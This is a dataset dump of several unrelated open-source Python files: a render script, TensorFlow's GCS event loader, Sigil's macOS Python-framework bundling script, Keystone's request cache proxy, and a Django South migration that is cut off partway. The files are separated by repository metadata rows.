# Catch Control-C.
signal.signal(signal.SIGINT, lambda signal, frame: renderer_controller.abort_rendering())
tile_callback = TileCallback()
renderer = asr.MasterRenderer(project,
project.configurations()['final'].get_inherited_parameters(),
renderer_controller,
tile_callback)
# Render the frame.
if RENDER_ON_THREAD:
render_thread = RenderThread(renderer)
render_thread.start()
while render_thread.isAlive():
render_thread.join(0.5) # seconds
else:
renderer.render()
# Save the frame to disk.
project.get_frame().write_main_image("output/test.png")
# Save the project to disk.
asr.ProjectFileWriter().write(project, "output/test.appleseed")
# Remove the log target we added previosly.
asr.global_logger().remove_target(log_target)
if __name__ == "__main__":
main()
| mit | 8,368,787,666,049,666,000 | 38.756272 | 136 | 0.61621 | false |
panmari/tensorflow | tensorflow/python/summary/impl/gcs_file_loader.py | 6 | 2414 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loads events from a file stored on Google Cloud Storage."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from tensorflow.core.util import event_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.platform import app
from tensorflow.python.platform import logging
from tensorflow.python.summary.impl import gcs
from tensorflow.python.util import compat
class GCSFileLoader(object):
"""A GCSFileLoader loads Event protos from a path to GCS storage.
The GCSFileLoader keeps track of the offset in the file, copies the contents
of the file to local disk, reads it, and then immediately deletes the file.
"""
def __init__(self, gcs_path):
if not gcs.IsGCSPath(gcs_path):
raise ValueError('A GCS path is required')
self._gcs_path = gcs_path
self._gcs_offset = 0
def Load(self):
# Create a temp file to hold the contents that we haven't seen yet.
with tempfile.NamedTemporaryFile(prefix='tf-gcs-') as temp_file:
name = temp_file.name
logging.debug('Temp file created at %s', name)
gcs.CopyContents(self._gcs_path, self._gcs_offset, temp_file)
reader = pywrap_tensorflow.PyRecordReader_New(compat.as_bytes(name), 0)
while reader.GetNext():
event = event_pb2.Event()
event.ParseFromString(reader.record())
yield event
logging.debug('No more events in %s', name)
self._gcs_offset += reader.offset()
def main(argv):
if len(argv) != 2:
print('Usage: gcs_file_loader <path-to-gcs-object>')
return 1
loader = GCSFileLoader(argv[1])
for event in loader.Load():
print(event)
if __name__ == '__main__':
app.run()
| apache-2.0 | -8,562,513,424,797,277,000 | 34.5 | 80 | 0.692212 | false |
varlog00/Sigil | src/Resource_Files/python_pkg/osx_add_python_framework.py | 1 | 6952 | #!/usr/bin/env python3
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import sys, os, inspect, shutil, platform, site, subprocess
# the destination directory inside Sigil.app
app_dir = os.path.dirname(os.path.realpath(__file__))
app_dir = os.path.join(app_dir, 'Sigil.app','Contents','Frameworks')
# actual version of Python used to build Sigil
build_fwk = os.path.abspath(sys.prefix + '../../../')
# get python version string
pversion = build_fwk.split(os.sep)[-1]
#get library directory and basename
stdlib_dir = os.path.dirname(inspect.getfile(os))
stdlib_name = stdlib_dir.split(os.sep)[-1]
print('build_fwk', build_fwk)
print('pversion', pversion)
print('stdlib_dir', stdlib_dir)
print('stdlib_name', stdlib_name)
print('app_dir', app_dir)
# the main Python.framework directories
fwk_struct = ['Python.framework/Versions/' + pversion + '/lib/' + stdlib_name + '/site-packages',
'Python.framework/Versions/' + pversion + '/bin'
]
def copy_python_stdlibrary(src_dir, dest_dir):
for x in os.listdir(src_dir):
y = os.path.join(src_dir, x)
ext = os.path.splitext(x)[1]
if os.path.isdir(y) and x not in ('test', 'hotshot', 'distutils',
'site-packages', 'idlelib', 'lib2to3', 'dist-packages', '__pycache__'):
shutil.copytree(y, os.path.join(dest_dir, x),
ignore=ignore_in_dirs)
if os.path.isfile(y) and ext in ('.py', '.so'):
shutil.copy2(y, dest_dir)
site_packages = [ ('lxml', 'd'),
('six.py', 'f'),
('html5lib','d'),
('PIL', 'd'),
('regex.py','f'),
('_regex.so','f'),
('_regex.cpython-35m-darwin.so','f'),
('_regex_core.py','f'),
('test_regex.py', 'f'),
('cssselect', 'd'),
('encutils', 'd'),
('cssutils', 'd'),
('webencodings', 'd'), # needed by html5lib
('chardet', 'd')]
def copy_site_packages(packages, site_dest):
for pkg, typ in packages:
found = False
for apath in site.getsitepackages():
if not found and os.path.exists(apath) and os.path.isdir(apath):
apath = os.path.abspath(apath)
for entry in os.listdir(apath):
if entry == pkg:
if typ == 'd' and os.path.isdir(os.path.join(apath, entry)):
shutil.copytree(os.path.join(apath, entry), os.path.join(site_dest, entry), ignore=ignore_in_dirs)
found = True
break
else:
if os.path.isfile(os.path.join(apath, entry)):
shutil.copy2(os.path.join(apath, entry), os.path.join(site_dest, entry))
found = True
break
else:
break
def ignore_in_dirs(base, items, ignored_dirs=None):
ans = []
if ignored_dirs is None:
ignored_dirs = {'.svn', '.bzr', '.git', 'test', 'tests', 'testing', '__pycache__'}
for name in items:
path = os.path.join(base, name)
if os.path.isdir(path):
# Note: PIL has a .dylibs directory that has no __init__.py in it but does contain *.dylib files
if name in ignored_dirs: # or not os.path.exists(os.path.join(path, '__init__.py')):
ans.append(name)
else:
if name.rpartition('.')[-1] not in ('so', 'py', 'dylib'):
ans.append(name)
return ans
def get_rpaths(path_to_executable):
rpaths = []
raw = subprocess.check_output(['otool', '-l', path_to_executable])
found_rpath = False
for line in raw.splitlines():
if b'LC_RPATH' in line:
found_rpath = True
continue
if found_rpath:
if b'path ' in line:
uline = line.decode('utf-8')
bp = uline.find('path ') + 5
ep = uline.find('(')
rpath = uline[bp:ep].strip()
rpaths.append(rpath)
found_rpath = False
return rpaths
def main():
# create the location inside Sigil.app for Frameworks
os.makedirs(app_dir, exist_ok=True)
# create the basic Python.framework structure
for pth in fwk_struct:
os.makedirs(os.path.join(app_dir, pth), exist_ok=True)
# first copy all python standard library files to their proper place in the framework
dest_dir = os.path.join(app_dir,'Python.framework','Versions', pversion, 'lib', stdlib_name)
copy_python_stdlibrary(stdlib_dir, dest_dir)
# now handle the site-packages separately
dest_dir = os.path.join(app_dir,'Python.framework','Versions', pversion, 'lib', stdlib_name, 'site-packages')
copy_site_packages(site_packages, dest_dir)
# next copy the bin
src_file = os.path.join(build_fwk, 'bin', 'python3')
dest_file = os.path.join(app_dir, 'Python.framework', 'Versions', pversion, 'bin', 'python3')
shutil.copy2(src_file, dest_file)
# next copy the framework (dylib itself) itself
src_file = os.path.join(build_fwk, 'Python')
dest_file = os.path.join(app_dir, 'Python.framework','Versions', pversion, 'Python')
shutil.copy2(src_file, dest_file)
# copy the Resources recursively
# Note: for copytree to work, the destination must NOT already exist
src_dir = os.path.join(build_fwk, 'Resources')
dest_dir = os.path.join(app_dir, 'Python.framework','Versions', pversion, 'Resources')
shutil.copytree(src_dir, dest_dir)
# now create proper symlinks to make everything work
src_dir = os.path.join(app_dir, 'Python.framework/Versions')
os.chdir(src_dir)
os.symlink(pversion, 'Current')
src_dir = os.path.join(app_dir, 'Python.framework')
os.chdir(src_dir)
os.symlink(os.path.join('Versions','Current', 'Python'), 'Python')
os.symlink(os.path.join('Versions', 'Current', 'Resources'), 'Resources')
os.chdir(os.path.join(app_dir, 'Python.framework', 'Versions', pversion, 'lib'))
dylibname = 'libpython' + pversion + 'm.dylib'
os.symlink('../Python', dylibname)
# finally change any Python.framework rpaths in the Sigil executable to point to the new local Python.framework
sigil_executable_path = os.path.abspath(os.path.join(app_dir,'..','MacOS','Sigil'))
rpaths = get_rpaths(sigil_executable_path)
for rpath in rpaths:
if 'Python.framework' in rpath:
new_rpath = '@executable_path/../Frameworks/Python.framework/Versions/' + pversion
subprocess.check_call(['install_name_tool', '-rpath', rpath, new_rpath, sigil_executable_path])
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | 2,236,093,908,645,464,600 | 39.894118 | 126 | 0.57897 | false |
himanshu-setia/keystone | keystone/common/cache/_context_cache.py | 2 | 4518 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A dogpile.cache proxy that caches objects in the request local cache."""
from dogpile.cache import api
from dogpile.cache import proxy
from oslo_context import context as oslo_context
from oslo_serialization import msgpackutils
from keystone.models import revoke_model
class _RevokeModelHandler(object):
# NOTE(morganfainberg): There needs to be reserved "registry" entries set
# in oslo_serialization for application-specific handlers. We picked 127
# here since it's waaaaaay far out before oslo_serialization will use it.
identity = 127
handles = (revoke_model.RevokeTree,)
def __init__(self, registry):
self._registry = registry
def serialize(self, obj):
return msgpackutils.dumps(obj.revoke_map,
registry=self._registry)
def deserialize(self, data):
revoke_map = msgpackutils.loads(data, registry=self._registry)
revoke_tree = revoke_model.RevokeTree()
revoke_tree.revoke_map = revoke_map
return revoke_tree
# Register our new handler.
_registry = msgpackutils.default_registry
_registry.frozen = False
_registry.register(_RevokeModelHandler(registry=_registry))
_registry.frozen = True
class _ResponseCacheProxy(proxy.ProxyBackend):
__key_pfx = '_request_cache_%s'
def _get_request_context(self):
# Return the current context or a new/empty context.
return oslo_context.get_current() or oslo_context.RequestContext()
def _get_request_key(self, key):
return self.__key_pfx % key
def _set_local_cache(self, key, value, ctx=None):
# Set a serialized version of the returned value in local cache for
# subsequent calls to the memoized method.
if not ctx:
ctx = self._get_request_context()
serialize = {'payload': value.payload, 'metadata': value.metadata}
setattr(ctx, self._get_request_key(key), msgpackutils.dumps(serialize))
ctx.update_store()
def _get_local_cache(self, key):
# Return the version from our local request cache if it exists.
ctx = self._get_request_context()
try:
value = getattr(ctx, self._get_request_key(key))
except AttributeError:
return api.NO_VALUE
value = msgpackutils.loads(value)
return api.CachedValue(payload=value['payload'],
metadata=value['metadata'])
def _delete_local_cache(self, key):
# On invalidate/delete remove the value from the local request cache
ctx = self._get_request_context()
try:
delattr(ctx, self._get_request_key(key))
ctx.update_store()
except AttributeError: # nosec
# NOTE(morganfainberg): We will simply pass here, this value has
# not been cached locally in the request.
pass
def get(self, key):
value = self._get_local_cache(key)
if value is api.NO_VALUE:
value = self.proxied.get(key)
return value
def set(self, key, value):
self._set_local_cache(key, value)
self.proxied.set(key, value)
def delete(self, key):
self._delete_local_cache(key)
self.proxied.delete(key)
def get_multi(self, keys):
values = {}
for key in keys:
v = self._get_local_cache(key)
if v is not api.NO_VALUE:
values[key] = v
query_keys = set(keys).difference(set(values.keys()))
values.update(dict(
zip(query_keys, self.proxied.get_multi(query_keys))))
return [values[k] for k in keys]
def set_multi(self, mapping):
ctx = self._get_request_context()
for k, v in mapping.items():
self._set_local_cache(k, v, ctx)
self.proxied.set_multi(mapping)
def delete_multi(self, keys):
for k in keys:
self._delete_local_cache(k)
self.proxied.delete_multi(keys)
| apache-2.0 | -6,136,240,338,083,445,000 | 34.574803 | 79 | 0.644754 | false |
evildmp/arkestra-clinical-studies | arkestra_clinical_studies/xmigrations/0003_auto.py | 1 | 33907 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing M2M table for field trialtype on 'ClinicalTrial'
db.delete_table(db.shorten_name('arkestra_clinical_trials_clinicaltrial_trialtype'))
def backwards(self, orm):
# Adding M2M table for field trialtype on 'ClinicalTrial'
m2m_table_name = db.shorten_name('arkestra_clinical_trials_clinicaltrial_trialtype')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('clinicaltrial', models.ForeignKey(orm['arkestra_clinical_trials.clinicaltrial'], null=False)),
('clinicaltrialtype', models.ForeignKey(orm['arkestra_clinical_trials.clinicaltrialtype'], null=False))
))
db.create_unique(m2m_table_name, ['clinicaltrial_id', 'clinicaltrialtype_id'])
models = {
'arkestra_clinical_trials.clinicaltrial': {
'Meta': {'object_name': 'ClinicalTrial'},
'body': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'chief_investigators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_chief_investigators'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Person']"}),
'clinical_centre': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_clinical_centres'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'clinicaltrial_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'full_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'funding_body': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_funding_bodies'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'grant_value': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'hosted_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clinicaltrial_hosted_events'", 'on_delete': 'models.SET_DEFAULT', 'default': 'None', 'to': "orm['contacts_and_people.Entity']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'importance': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'in_lists': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'please_contact': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_person'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Person']"}),
'publish_to': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_publish_to'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'sponsor': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_sponsors'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "'setup'", 'max_length': '25'}),
'summary': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'arkestra_clinical_trials.clinicaltrialentity': {
'Meta': {'object_name': 'ClinicalTrialEntity'},
'clinical_trials_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clinical_trials_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'entity': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'clinical_trial_entity'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['contacts_and_people.Entity']"}),
'menu_title': ('django.db.models.fields.CharField', [], {'default': "'Clinical trials'", 'max_length': '50'}),
'publish_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'arkestra_clinical_trials.clinicaltrialtype': {
'Meta': {'object_name': 'ClinicalTrialType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.page': {
'Meta': {'ordering': "('site', 'tree_id', 'lft')", 'object_name': 'Page'},
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'page_flags': ('django.db.models.fields.TextField', [], {'null': True, 'blank': True}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'contacts_and_people.building': {
'Meta': {'ordering': "('site', 'street', 'number', 'name')", 'object_name': 'Building'},
'access_and_parking': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'building_access_and_parking'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'additional_street_address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'building_description'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'getting_here': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'getting_here'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'map': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '9', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'place'", 'on_delete': 'models.PROTECT', 'to': "orm['contacts_and_people.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '256'}),
'zoom': ('django.db.models.fields.IntegerField', [], {'default': '17', 'null': 'True', 'blank': 'True'})
},
'contacts_and_people.entity': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Entity', '_ormbases': ['contacts_and_people.EntityLite']},
'abstract_entity': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'access_note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auto_contacts_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_news_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_publications_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_vacancies_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'building': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Building']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'building_recapitulates_entity_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'contacts_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'contacts_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'contacts_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Contacts & people'", 'max_length': '50'}),
'display_parent': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'entitylite_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts_and_people.EntityLite']", 'unique': 'True', 'primary_key': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'entity_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'news_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'news_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'news_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'News & events'", 'max_length': '50'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['contacts_and_people.Entity']"}),
'precise_location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'publications_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Publications'", 'max_length': '50'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vacancies_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'vacancies_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'vacancies_page_menu_title': ('django.db.models.fields.CharField', [], {'default': "'Vacancies & studentships'", 'max_length': '50'}),
'website': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entity'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['cms.Page']", 'blank': 'True', 'unique': 'True'})
},
'contacts_and_people.entitylite': {
'Meta': {'object_name': 'EntityLite'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'contacts_and_people.membership': {
'Meta': {'ordering': "('-importance_to_entity', 'person__surname')", 'object_name': 'Membership'},
'display_role': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'display_roles'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Membership']"}),
'entity': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['contacts_and_people.Entity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance_to_entity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'importance_to_person': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'key_contact': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_of'", 'to': "orm['contacts_and_people.Person']"}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
'contacts_and_people.person': {
'Meta': {'ordering': "['surname', 'given_name', 'user']", 'object_name': 'Person', '_ormbases': ['contacts_and_people.PersonLite']},
'access_note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'building': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Building']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'data_feed_locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'entities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'people'", 'to': "orm['contacts_and_people.Entity']", 'through': "orm['contacts_and_people.Membership']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'person_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'institutional_username': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'override_entity': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'people_override'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Entity']"}),
